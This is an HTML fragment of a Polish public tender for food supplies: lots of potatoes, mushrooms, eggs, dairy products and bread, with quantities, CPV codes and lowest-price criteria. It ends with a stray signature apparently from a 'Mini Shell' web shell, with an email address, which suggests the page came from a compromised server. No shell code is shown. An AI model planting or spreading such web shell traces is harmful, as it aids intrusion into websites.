<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje dla tej części dostawę:
Ziemniaki jadalne (w workach siatkowych po 15kg)	8 000kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pieczarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje:
Pieczarki 	150kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja (rozmiar minimum XL)	8 000szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje:
Jogurt naturalny 180g	30szt.
Jogurt 400g np. Aktimel	900szt.
Serek waniliowy 140g	3 500szt.
Jogurt owocowy od 120g do150 g (różne smaki)		8 500szt.
Ser biały półtłusty	250kg
Ser żółty (Gouda)	100kg
Ser topiony śmietankowy	45kg
Śmietana 30%	800L
Masło Extra (kostka 250g)	50kg
Margaryna (kostka 250g) np. Palma 	120kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla tej części obejmuje:
Chleb mieszany krojony 0,9kg	1 200	szt.
Chleb mieszany 0,6kg (foremka) krojony	700	szt.
Bułka zwykła pszenna 100g	4 500	szt.
Bułka słodka z nadzieniem 100g	3 000	szt.
Bułka tarta	60 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com